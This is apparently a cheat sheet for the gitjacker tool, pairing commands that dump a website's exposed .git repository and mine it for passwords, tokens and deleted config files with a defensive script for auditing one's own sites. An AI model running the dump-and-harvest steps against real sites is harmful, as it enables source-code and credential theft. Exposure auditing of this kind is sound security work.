Description
gitjacker extracts source code from websites with exposed .git directories. When a web server accidentally exposes the .git folder, gitjacker reconstructs the full repository including all files, commit history, and potentially sensitive configuration files and secrets.
Installation
```bash
# Using Go (the main package lives under cmd/gitjacker)
go install github.com/liamg/gitjacker/cmd/gitjacker@latest

# Binary from releases
# https://github.com/liamg/gitjacker/releases
```
Basic Usage
```bash
# Dump exposed git repository
gitjacker https://target.com/.git/

# Output to directory
gitjacker https://target.com/.git/ -o ./dumped_repo/
```
Advanced Usage
```bash
# Verbose output
gitjacker https://target.com/.git/ -v

# Custom output directory
gitjacker https://target.com/.git/ -o /tmp/target_source/

# After dumping, extract secrets
cd /tmp/target_source/
git log --all --oneline   # View commit history
git diff HEAD~10 HEAD     # Check recent changes for secrets
grep -r "password\|secret\|api_key\|token" . --include="*.py" --include="*.js" --include="*.php"
```
Common Workflows
```bash
# Step 1: Check if .git is exposed
curl -s https://target.com/.git/HEAD
# Should return: ref: refs/heads/main (or master)

# Step 2: Dump the repo
gitjacker https://target.com/.git/ -o ./dumped/

# Step 3: Analyze for secrets
cd dumped/
trufflehog filesystem .
gitleaks detect -s .

# Step 4: Review commit history for sensitive data
git log --all --diff-filter=D --summary   # Find deleted files
git log --all -p -- "*.env" "*.config" "*password*"
```
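
The step 1 check above, turned into an exposure audit for sites you operate. This is an added example, not part of the original page or the gitjacker project. The function names `classify_head` and `audit_url` and the sample hostnames are assumptions made for illustration. It validates the body of `.git/HEAD` so that catch-all pages answering 200 with HTML are not reported as exposed, and it also recognises a detached HEAD (a bare object id).

```shell
#!/bin/sh
# Added example: audit your own sites for a served .git/HEAD file.
# Function names and hostnames are illustrative, not from gitjacker.

# classify_head STATUS BODY -> prints "exposed" or "not-exposed".
# A real HEAD file is either a symbolic ref ("ref: refs/heads/<branch>")
# or, for a detached HEAD, a bare 40-hex (SHA-1) or 64-hex (SHA-256) id.
classify_head() {
    status=$1
    body=$2
    # Anything other than 200 means the file itself was not served.
    [ "$status" = "200" ] || { echo "not-exposed"; return 0; }
    # Only the first line matters; drop a trailing CR if the server added one.
    first=$(printf '%s\n' "$body" | head -n 1 | tr -d '\r')
    case $first in
        "ref: refs/"?*) echo "exposed"; return 0 ;;
    esac
    if printf '%s' "$first" | grep -Eq '^([0-9a-f]{40}|[0-9a-f]{64})$'; then
        echo "exposed"
    else
        # 200 with HTML or other text: a soft-404 or catch-all page.
        echo "not-exposed"
    fi
}

# audit_url BASE_URL -> fetches BASE_URL/.git/HEAD and prints "<result>\t<url>".
audit_url() {
    base=${1%/}
    tmp=$(mktemp) || return 1
    # curl prints 000 as the status when the connection fails.
    status=$(curl -s -o "$tmp" -w '%{http_code}' --max-time 10 "$base/.git/HEAD") || true
    result=$(classify_head "$status" "$(cat "$tmp")")
    rm -f "$tmp"
    printf '%s\t%s\n' "$result" "$base"
}

# Usage: sh check_git_exposure.sh https://www.example.com https://app.example.com
for url in "$@"; do
    audit_url "$url"
done
```

Any host reported as `exposed` should have `.git` removed from the web root or blocked at the web server, and every credential that ever appeared in the repository history rotated.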